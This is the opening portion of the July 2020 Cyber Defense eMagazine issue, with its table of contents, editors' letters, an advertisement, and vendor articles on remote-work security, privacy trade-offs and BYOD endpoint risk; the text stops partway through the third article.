Cyber Defense eMagazine July 2020 Edition
Cyber Defense eMagazine July Edition for 2020 #CDM #CYBERDEFENSEMAG @CyberDefenseMag by @Miliefsky a world-renowned cyber security expert and the Publisher of Cyber Defense Magazine as part of the Cyber Defense Media Group as well as Yan Ross, US Editor-in-Chief, Pieruligi Paganini, Co-founder & International Editor-in-Chief, Stevin Miliefsky, President and many more writers, partners and supporters who make this an awesome publication! Thank you all and to our readers! OSINT ROCKS! #CDM #CDMG #OSINT #CYBERSECURITY #INFOSEC #BEST #PRACTICES #TIPS #TECHNIQUES
Cyber Defense eMagazine July Edition for 2020 #CDM #CYBERDEFENSEMAG @CyberDefenseMag by @Miliefsky a world-renowned cyber security expert and the Publisher of Cyber Defense Magazine as part of the Cyber Defense Media Group as well as Yan Ross, US Editor-in-Chief, Pieruligi Paganini, Co-founder & International Editor-in-Chief, Stevin Miliefsky, President and many more writers, partners and supporters who make this an awesome publication! Thank you all and to our readers! OSINT ROCKS! #CDM #CDMG #OSINT #CYBERSECURITY #INFOSEC #BEST #PRACTICES #TIPS #TECHNIQUES
Create successful ePaper yourself
Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.
Security, Convenience & Privacy: A<br />
Neverending War<br />
Is the New Normal Workspace Secure?<br />
3 Practices to Avoid Security Risk in A Work<br />
from Home World<br />
7 Security Precautions to Protect Remote<br />
Workers<br />
…and much more…<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 1<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
CONTENTS<br />
Welcome to CDM’s <strong>July</strong> <strong>2020</strong> Issue ------------------------------------------------------------------------------------------------- 7<br />
Security, Convenience & Privacy: A Neverending War------------------------------------------------------------- 24<br />
By Michael Covington, VP of Product Strategy, Wandera<br />
Is the New Normal Workspace Secure? ------------------------------------------------------------------------------- 26<br />
By Simon Townsend, CMO, IGEL<br />
3 Practices to Avoid Security Risk in A Work from Home World ------------------------------------------------ 29<br />
By Akshay Bhargava, Chief Product Officer, Malwarebytes<br />
7 Security Precautions to Protect Remote Workers ---------------------------------------------------------------- 32<br />
By Marty Puranik, President & CEO, Atlantic.Net<br />
The Race to Pivot Around Remote Work and The Emergence Of SASE ---------------------------------------- 36<br />
By Amit Bareket, CEO and Co-Founder of Perimeter 81<br />
Organizations: It’s Time to Rethink How You Protect Environments from Within-------------------------- 39<br />
By Richard Melick, senior technical product manager, Automox<br />
Don’t Be Breached When Using Commercial Software Products ----------------------------------------------- 42<br />
By Randy Reiter CEO of Don’t Be Breached<br />
Is Proactive Insider Risk Mitigation Possible? ------------------------------------------------------------------------ 44<br />
By David A. Sanders, Director of Insider Threat Operations, Haystax<br />
Benefits of A Security Operation Center (SOC) ----------------------------------------------------------------------- 50<br />
By Pedro Tavares, Editor-in-Chief seguranca-informatica.pt<br />
In <strong>2020</strong>, SOCs Are Understaffed Yet Overconfident in Ability to Detect <strong>Cyber</strong>threats --------------------- 53<br />
By Steve Moore, chief security strategist, and Samantha Humphries, senior product marketing manager,<br />
Exabeam<br />
Software-Defined Perimeters Offer Secure Connectivity to Smart Cities ------------------------------------- 60<br />
By Don Boxley, CEO and Co-Founder, DH2i (www.dh2i.com)<br />
Managing Small Business <strong>Cyber</strong>security During Covid-19 -------------------------------------------------------- 63<br />
By Bill DeLisi, CEO of GOFBA<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 2<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
IOT Security Embedded in Memory Cards ----------------------------------------------------------------------------- 66<br />
By Hubertus Grobbel, Vice President Security Solutions, Swissbit.<br />
How To Fight A Virus: Lessons From <strong>Cyber</strong>security ----------------------------------------------------------------- 70<br />
By Yotam Gutman, SentinelOne<br />
How to Combat <strong>Cyber</strong>security Attacks & <strong>Cyber</strong> Warfare --------------------------------------------------------- 74<br />
By Adnan Olia, Chief Operating Officer and Co-owner of Intradyn<br />
COVID-19 And the Easyjet Hack - A Perfect Phishing Storm ------------------------------------------------------ 78<br />
By Shachar Daniel, Safe-T’s CEO<br />
Should We Be Worried About Vehicle Hacking? -------------------------------------------------------------------- 81<br />
By Martin Banks<br />
<strong>Cyber</strong> Attacks at Sea: Blinding Warships. ----------------------------------------------------------------------------- 85<br />
By Julien Chesaux, <strong>Cyber</strong> Security Consultant, Kudelski Security<br />
Iphone Extraction Without A Jailbreak -------------------------------------------------------------------------------- 92<br />
By Oleg Afonin, Security Researcher, ElcomSoft Co.Ltd.<br />
How to Maintain Anonymity in Communications? ----------------------------------------------------------------- 96<br />
By Milica D. Djekic<br />
Everything You Want to Know About Single Sign-On ------------------------------------------------------------ 100<br />
By Ayman Totounji, Founder , Cynexlink<br />
A Passwordless Future: Will Biometric Identification Replace Passwords? -------------------------------- 106<br />
By Joshua Frisby, Founder of PasswordManagers.co<br />
Post COVID-19: Cloud, Remote Work and BYOD Security Predictions --------------------------------------- 111<br />
By Anurag Kahol, CTO and co-founder, Bitglass<br />
The Rise of COVID-19 Phishing Attacks: How <strong>Cyber</strong> Adversaries Are Adopting Phishing to Generate<br />
New Threat Vectors ------------------------------------------------------------------------------------------------------- 113<br />
By Brad Slavin, CEO of DuoCircle LLC<br />
Post COVID-19: Password Extinction Accelerated; Telemedicine Spurs Fraud ----------------------------- 117<br />
By Robert Prigge, CEO of Jumio<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 3<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
The Future Of Security – Predictions Post COVID-19 ------------------------------------------------------------- 119<br />
By Mike Riemer, Pulse Secure, Global Chief Security Architect<br />
Post COVID-19 <strong>Cyber</strong>security and Future-of-Work Predictions ------------------------------------------------ 121<br />
By DivvyCloud by Rapid7, Chris DeRamus, VP of Technology, Cloud Security Practice<br />
Building A Telework Health Scorecard To Meet Surge Requirements And Long-Term Resiliency ---- 124<br />
By Stan Lowe, Global Chief Information Security Officer, Zscaler<br />
CERT Warns Bad Actors Are Targeting Remote Access – How Security Operations Find And Route<br />
These “Below The Radar” Attacks ------------------------------------------------------------------------------------ 128<br />
By Saryu Nayyar, CEO, Gurucul<br />
CRYPTO ---------------------------------------------------------------------------------------------------------------------- 130<br />
By Staford Titus S<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 4<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
@MILIEFSKY<br />
From the<br />
Publisher…<br />
New <strong>Cyber</strong><strong>Defense</strong>Magazine.com website, plus updates at <strong>Cyber</strong><strong>Defense</strong>TV.com & <strong>Cyber</strong><strong>Defense</strong>Radio.com<br />
Dear Friends,<br />
Since last month, we’ve seen a continuation and deepening of the effects of COVID-19 on<br />
nearly all enterprises which depend on cyberspace for their operations. Both the articles in<br />
this month’s magazine and our daily publications, as well as news from nearly all channels,<br />
reflect the challenges of maintaining security in an ever-growing dependence on cyberrelated<br />
systems of all kinds.<br />
At the same time as the “normal” operations of enterprises across the board deal with these<br />
issues on a daily basis, one major periodic phenomenon is coming into sharp focus. The<br />
election cycle in the United States is upon us, with a mere 4 months until the presidential election.<br />
There is little doubt that electronic activities will have a significant effect on the outcome of the election. Already<br />
forces from both legitimate and illicit entities are manifesting their influence. From social media to traditional<br />
news and commentary outlets, both attackers and defenders appear to be gearing up.<br />
The apparent result of reopening of various States and municipalities has been described as a resurgence of the<br />
first wave of COVID-19 as well as an incipient second wave. Whichever it is, the effects upon widespread<br />
operations in the marketplace and the more focused impact on the electoral campaigns are undeniable. We will<br />
continue to watch closely and report further developments.<br />
We are pleased to continue providing the powerful combination of monthly <strong>eMagazine</strong>s, daily updates and<br />
features on the <strong>Cyber</strong> <strong>Defense</strong> Magazine home page, and webinars featuring national and international experts<br />
on topics of immediate interest.<br />
Warmest regards,<br />
Gary S. Miliefsky<br />
Gary S.Miliefsky, CISSP®, fmDHS<br />
CEO, <strong>Cyber</strong> <strong>Defense</strong> Media Group<br />
Publisher, <strong>Cyber</strong> <strong>Defense</strong> Magazine<br />
P.S. When you share a story or an article or information about CDM, please use #CDM and<br />
@<strong>Cyber</strong><strong>Defense</strong>Mag and @Miliefsky – it helps spread the word about our free resources even more<br />
quickly<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 5<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
@CYBERDEFENSEMAG<br />
CYBER DEFENSE eMAGAZINE<br />
Published monthly by the team at <strong>Cyber</strong> <strong>Defense</strong> Media Group and<br />
distributed electronically via opt-in Email, HTML, PDF and Online<br />
Flipbook formats.<br />
InfoSec Knowledge is Power. We will<br />
always strive to provide the latest, most<br />
up to date FREE InfoSec information.<br />
From the International<br />
Editor-in-Chief…<br />
The international effects of recent medical and political<br />
developments continue to show up prominently in the world of<br />
cybersecurity. We see a continuation of trends in Coronavirus<br />
effects, cyber-criminal activity, and government actions in response<br />
to these threats.<br />
International effects of COVID-19 include restrictions on physical<br />
travel, resulting in greater dependence on cyber “travel” to<br />
accomplish necessary business and government functions. As<br />
might be expected, the expanded reliance on cyber assets also<br />
provide greater opportunities for criminal activity.<br />
We may also note the divergence in approaches between the<br />
European model, using an integrated set of laws and regulations,<br />
on one hand, and the U.S. model, which tends to respond to these<br />
challenges on a State-by-State basis, on the other. I hasten to add<br />
there are some indications of movement on the federal level to<br />
adopt national privacy laws which would provide a greater measure<br />
of conformity.<br />
As I observed last month, failure to work together in a cooperative<br />
fashion can only provide more opportunities for the abuse and<br />
misuse of sensitive information, even leading to the compromise of<br />
the command and control systems of our critical infrastructure.<br />
Accordingly, may I suggest that in the days ahead we agree to put<br />
our differences aside in favor of responding to our common<br />
enemies: the COVID-19 virus itself and those who would take<br />
advantage of this crisis to perpetrate criminal schemes.<br />
To our faithful readers, we thank you,<br />
Pierluigi Paganini<br />
International Editor-in-Chief<br />
PRESIDENT & CO-FOUNDER<br />
Stevin Miliefsky<br />
stevinv@cyberdefensemagazine.com<br />
INTERNATIONAL EDITOR-IN-CHIEF & CO-FOUNDER<br />
Pierluigi Paganini, CEH<br />
Pierluigi.paganini@cyberdefensemagazine.com<br />
US EDITOR-IN-CHIEF<br />
Yan Ross, JD<br />
Yan.Ross@cyberdefensemediagroup.com<br />
ADVERTISING<br />
Marketing Team<br />
marketing@cyberdefensemagazine.com<br />
CONTACT US:<br />
<strong>Cyber</strong> <strong>Defense</strong> Magazine<br />
Toll Free: 1-833-844-9468<br />
International: +1-603-280-4451<br />
SKYPE: cyber.defense<br />
http://www.cyberdefensemagazine.com<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine, a division of<br />
CYBER DEFENSE MEDIA GROUP (a Steven G. Samuels LLC d/b/a)<br />
276 Fifth Avenue, Suite 704, New York, NY 10001<br />
EIN: 454-18-8465, DUNS# 078358935.<br />
All rights reserved worldwide.<br />
PUBLISHER<br />
Gary S. Miliefsky, CISSP®<br />
Learn more about our founder & publisher at:<br />
http://www.cyberdefensemagazine.com/about-our-founder/<br />
8 YEARS OF EXCELLENCE!<br />
Providing free information, best practices, tips and<br />
techniques on cybersecurity since 2012, <strong>Cyber</strong> <strong>Defense</strong><br />
magazine is your go-to-source for Information Security.<br />
We’re a proud division of <strong>Cyber</strong> <strong>Defense</strong> Media Group:<br />
CYBERDEFENSEMEDIAGROUP.COM<br />
MAGAZINE TV RADIO AWARDS<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 6<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Welcome to CDM’s <strong>July</strong> <strong>2020</strong> Issue<br />
From the U.S. Editor-in-Chief<br />
Once again, the <strong>July</strong> issue of <strong>Cyber</strong> <strong>Defense</strong> Magazine brings readers over two dozen articles on cyber<br />
and security topics of immediate interest. We are fortunate to rely on a broad spectrum of contributors<br />
who share their expertise and insights with our community.<br />
We tend to look for trends and upcoming challenges and responses. For both individual consumers and<br />
corporate participants, the establishment of a “value proposition” is the cogent answer to the question<br />
“What problem does it solve?”<br />
This month, readers will see elaboration of issues beyond the standard “cybersecurity” problems to solve.<br />
For instance, the impact of the broad collection of sensitive personal data in controlling the spread of<br />
COVID-19 potentially calls for strong protections of individual privacy. At some point, a balance must be<br />
reached between the privacy needs of the individual and the “greater good,” a rhetorical construct which<br />
can often lead to unintended adverse consequences.<br />
The migration of workers to a permanent home-based operation appears to require more permanent<br />
cybersecurity solutions than just a temporary setup with expectations for workers to return to the more<br />
secure environment of HQ.<br />
The age-old saying that “the only constant is change” holds true in these times, as demonstrated by the<br />
breadth and depth of the articles we are pleased to bring you this month.<br />
Wishing you all success in your cyber security endeavors,<br />
Yan Ross<br />
US Editor-in-Chief<br />
<strong>Cyber</strong> <strong>Defense</strong> Magazine<br />
About the US Editor-in-Chief<br />
Yan Ross, J.D., is a <strong>Cyber</strong>security Journalist & US Editor-in-Chief for<br />
<strong>Cyber</strong> <strong>Defense</strong> Magazine. He is an accredited author and educator and<br />
has provided editorial services for award-winning best-selling books on<br />
a variety of topics. He also serves as ICFE's Director of Special Projects,<br />
and the author of the Certified Identity Theft Risk Management Specialist<br />
® XV CITRMS® course. As an accredited educator for over 20 years, Yan addresses risk management<br />
in the areas of identity theft, privacy, and cyber security for consumers and organizations holding sensitive<br />
personal information. You can reach him via his e-mail address at<br />
yan.ross@cyberdefensemediagroup.com<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 7<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 8<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 9<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 10<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 11<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 12<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 13<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 14<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 15<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 16<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Your website could be vulnerable to outside attacks. Wouldn’t you like to know where those<br />
vulnerabilities lie? Sign up today for your free trial of WhiteHat Sentinel Dynamic and gain a deep<br />
understanding of your web application vulnerabilities, how to prioritize them, and what to do about<br />
them. With this trial you will get:<br />
An evaluation of the security of one of your organization’s websites<br />
Application security guidance from security engineers in WhiteHat’s Threat Research Center<br />
Full access to Sentinel’s web-based interface, offering the ability to review and generate reports as well<br />
as share findings with internal developers and security management<br />
A customized review and complimentary final executive and technical report<br />
Click here to sign up at this URL: https://www.whitehatsec.com/info/security-check/<br />
PLEASE NOTE: Trial participation is subject to qualification.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 17<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 18<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 19<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 20<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 21<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 22<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 23<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Security, Convenience & Privacy: A Neverending War<br />
By Michael Covington, VP of Product Strategy, Wandera<br />
The veritable “Sophie’s Choice” among security decision-makers has increasingly become the three-way<br />
tug-of-war between security, convenience and privacy. With the introduction of General Data Protection<br />
Regulation (GDPR) and California Consumer Privacy Act (CCPA) in 2018, there’s a clear global trend<br />
toward prioritizing consumer privacy. However, the COVID-19 pandemic has spurred unprecedented<br />
numbers of remote employees, leaving organizations grappling with a novel set of challenges when it<br />
comes to security. Yet according to Verizon’s Mobile Security Index <strong>2020</strong> (MSI), organizations continue<br />
to sacrifice security, with 52 percent of respondents citing convenience as a top reason to let security<br />
take a backseat.<br />
When GDPR took full effect in 2018, it was tangible evidence that people were ready to take more control<br />
over their personal data. The terms of GDPR require organizations to ensure that the personal information<br />
that is gathered during normal business transactions remains protected while still respecting the privacy<br />
rights of data owners, demonstrating a heightened sense of concern over personal data privacy. The<br />
passing of the California Consumer Privacy Act (CCPA) in the same year was further confirmation that<br />
consumers were concerned about where and how their personal data was being used, and legislators<br />
affirmed they were within their rights to know.<br />
So, the pressure for organizations to remain transparent while simultaneously protecting the security of<br />
their employees and users has been steadily building, leaving business and security leaders at a<br />
crossroads. So the question remains: how are organizations to choose between security, convenience,<br />
and privacy when it comes to their employees and customers alike?<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 24<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Industry giants have chosen to approach this ongoing dilemma in different ways. Particularly as it<br />
pertains to mobile security, Microsoft has tackled this challenge with the implementation of Mobile<br />
Application Management without enrollment (MAM-WE). As work environments become increasingly<br />
remote, organizations face an entirely new security landscape that will require them to adapt to BYOD<br />
scenarios. MAM-WE gives organizations the ability to manage individual apps to protect sensitive<br />
employee data, even from a personal device, in a setting outside the office. Microsoft’s offering is just an<br />
example of ways that companies have broached the issue of security, without sacrificing convenience<br />
and privacy.<br />
There was roughly 24 percent of the full-time U.S. workforce working remotely for at least a portion of<br />
their workweek in pre-pandemic days, but that number is steadily rising as a result of COVID-19. It’s now<br />
critical that security decision-makers not overlook the importance of mobile and cloud security in this<br />
evolving landscape. Our own analysis shows that as of March 30, the number of connections to<br />
collaboration tools like Zoom and Microsoft Teams has increased by 109% since the first week of<br />
February.<br />
As Verizon’s Bryan Sartin put it, “The types of devices, diverse applications and further emergence of<br />
IoT devices further complicate security. Everyone has to be deliberate and diligent about mobile security<br />
to protect themselves and their customers.” Reiterating the sentiment that leaders will have to recognize<br />
the inherent risks of increasingly mobile and cloud-connected environments and take proactive action.<br />
There is a way to strike a balance between providing a convenient user experience that also maintains<br />
the security and privacy of users. One recommendation would be for organizations to put policies in place<br />
that utilize offerings like Wandera Private Access or MAM-WE to ensure that the security of corporate<br />
data is not compromised, even when employees use a personal device. Outlining and adopting formal<br />
acceptable use policies within organizations will also be a step toward finding this balance.<br />
The findings from recent mobile threat research indicate a trend that decision-makers still believe they<br />
have to make a choice between security, convenience, and privacy for their organizations. But with more<br />
privacy-preserving and user-friendly security solutions becoming available, a harmonizing middle ground<br />
can be found. It’s time to leave the notion that organizations can’t have both in the past, and focus on<br />
solutions that allow for the security, convenience and privacy trifecta moving forward.<br />
About the Author<br />
Michael J. Covington, Ph.D., is a seasoned technologist and the Vice<br />
President of Product Strategy for Wandera, a leading provider of mobile<br />
security. Michael is a hands-on innovator with broad experience across the<br />
entire product life cycle, from planning and R&D to executing on company<br />
strategies. He previously held leadership roles at Intel Labs, Cisco Security,<br />
and Juniper Networks. With a diverse background as a published computer<br />
science researcher and as an IT professional, Michael has experienced<br />
technology from all sides and enjoys bringing innovations to the market,<br />
specifically in the areas of mobility and connectivity. He can be reached at<br />
@MJCovington and at https://www.wandera.com/<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 25<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Is the New Normal Workspace Secure?<br />
Remote working has accelerated the need to better secure endpoints everywhere<br />
By Simon Townsend, CMO, IGEL<br />
Just a few years ago we were predicting Desktop-as-a-Service (DaaS) would soon have its day as<br />
enterprises were looking for a way to keep up with the BYOD, multi-device, and user mobility movements.<br />
It was time to rethink the ‘desktop’ from a fixed-location to a fluid endpoint that could be anywhere – one<br />
which could exist as any device, and increasingly delivered virtually. Fast-forward to today and the<br />
COVID-19 crisis, and the need to adopt a more modern approach to managing and securing the endpoint<br />
has become painfully clear.<br />
Enterprises have had to pivot overnight to a workforce sheltering in place with people working remotely<br />
on a variety of devices that may or may not have been up to date on security protocols. With evidence<br />
mounting that companies like Twitter are blessing working remote as a regular option going forward,<br />
there are a few conclusions: 1) the workspace has to be digital since people are using multiple devices,<br />
on site or remotely, 2) endpoint security needs to embrace this new work model and close all security<br />
gaps, 3) DaaS and the cloud will become even more important to deliver consistent, secure user<br />
experiences, and 4) Virtual Desktop Infrastructure (VDI) continues to be an optimum strategy for<br />
maintaining system integrity from endpoints to the data center or cloud.<br />
VDI and DaaS Up to the Task<br />
New pressures on IT teams in response to the evolving COVID-19 recovery are not going to come with<br />
bigger budgets or more staff. The increased need to improve security and ensure any asset used<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 26<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
emotely is governed correctly via user profiles, associated policies, and access control, all while<br />
supporting productivity, is added to the day-to-day IT process challenges businesses face. In a recent<br />
survey of IT professionals Enterprise Strategy Group (ESG) found, after software licensing, inventory and<br />
compliance, the main challenges in delivering a full-featured desktop centered on the pace of change<br />
(30%), troubleshooting issues (29%) and operational costs (29%).<br />
VDI and DaaS offer solutions to these IT challenges, with the benefit of maintaining a high level of security<br />
without impacting user productivity. As ESG notes, businesses have implemented virtual desktop<br />
infrastructure (VDI) and desktop-as-a-service (DaaS) to enable remote employees, but only a small<br />
percentage of an employee base made use of this technology. Prior to COVID-19 neither technology<br />
had reached high deployment, percentage wise, within organizations. The ESG survey found 40% of<br />
respondents indicated that their organization currently uses VDI technology but 25% are on the verge of<br />
doing so. Similarly, ESG found 39% of respondents reported DaaS usage but planned an increase. Post<br />
COVID, ESG’s expectation is these deployments will rise to accommodate the changing work<br />
environment.<br />
Answering the Rise of Security Questions<br />
The new business landscape has sharpened the focus to the digital workspace, to make sure the basics<br />
of data security and risk mitigation are handled at the level needed to ensure business continuity. A more<br />
remote workforce has shown how essential endpoint management and security is to business survival.<br />
Businesses are looking at:<br />
1. Balancing the need for access policy controls with employees’ desire to use more BYOD devices<br />
remotely. The ESG survey found a significant disconnect: while 79% of organizations believe VDI<br />
and DaaS are more secure than traditional desktop provisioning, 65% of the respondents will<br />
have restrictions on the devices used to access VDI or DaaS workspaces. These businesses are<br />
not ready to adopt a policy in which employees are allowed to use personal devices. While they<br />
perceive VDI or DaaS as superior options, they draw the line at employee-owned devices.<br />
2. Embracing a digital workspace solution like Citrix Workspace to further enable secure remote<br />
access. Remote application and desktop delivery and access to web- and cloud-based DaaS<br />
apps via a secure browser, paired with secure endpoint management software will enable<br />
employees to access their user profile regardless of location. Whether using the cloud or DaaS,<br />
workloads and sensitive data are protected.<br />
3. Maintaining a high level of security without impacting user productivity. The ESG survey found<br />
improving employee collaboration to be a top priority in delivering desktop environments, followed<br />
closely by detecting security incidences, vulnerabilities, and risk, and managing user expectations<br />
of access, devices choice, and applications preferences. An effective solution is a next-gen,<br />
secure Linux OS on endpoints that can be auto-configured based on predefined profiles for simple<br />
user access. Device agnostic, this type of advanced endpoint software can enable organizations<br />
to secure all those remote BYOD devices without fear of security risk.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 27<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Making the New Normal Environment Safe<br />
IT teams are certainly faced with an unprecedented list of challenges this year. However, the tools to<br />
secure the new hybrid environment of more people working remotely fortunately do exist. VDI providers<br />
like Citrix are proven options for secure, device agnostic desktop delivery. DaaS gives organizations<br />
another route to deliver applications via the cloud, on demand and securely, enabling business continuity<br />
in the case of a disruptive event. Advanced endpoint management software is already in successful<br />
deployment, enabling workers to access their user profiles via the cloud, while IT policy controls are<br />
executed to support network security.<br />
Regardless of the system chosen, VDI or DaaS, the task is clear: organizations will need to embrace the<br />
use of more personal and BYOD devices, coupled with advanced security software to manage the<br />
changing work culture.<br />
About the Author<br />
Simon Townsend is global chief marketing officer for IGEL, provider of the<br />
next-gen edge OS for cloud workspaces.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 28<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
3 Practices to Avoid Security Risk in A Work from Home<br />
World<br />
By Akshay Bhargava, Chief Product Officer, Malwarebytes<br />
Well before COVID-19 hastened people working from home, users embraced “bring your own device”<br />
(BYOD) practices. It created a proliferation of work-connected personal mobile devices that have become<br />
a regular part of our workplace fabric. But today, as the workplace has shifted to our homes, employees<br />
are now practicing a “use your own device” (UYOD) approach which means even more personal devices<br />
are connecting to company networks.<br />
Like BYOD, UYOD, enables employees to be connected to work when they want, and over any device<br />
they have on hand – empowering them with the flexibility and access they need to work, at home. But<br />
one concern still prevails: how to ensure proper security protocols are set and stringently followed in<br />
order to provide the same level of security that corporate-owned devices bring.<br />
The COVID-19 phenomenon brings personal endpoint device security concerns, once again, to the<br />
forefront. Undoubtedly these personal devices come with a wide range of risk: while some diligent<br />
employees may fastidiously follow security protocols, others that don’t take cybersecurity threats as<br />
seriously will inadvertently expose their devices to bad actors. This uneven security posture comes at a<br />
time when research shows the volume of global threats against business endpoints has increased by 13<br />
percent year-over-year. From an increase in enterprise-focused threats to the diversification of<br />
sophisticated hacking and stealth techniques, cybercrime is clearly targeting organizations with<br />
increasing vengeance. And working from home on personal devices further elevates this risk.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 29<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Improving UYOD Security<br />
While all organizations face increasing risk at the endpoint, small-to-medium sized businesses (SMBs)<br />
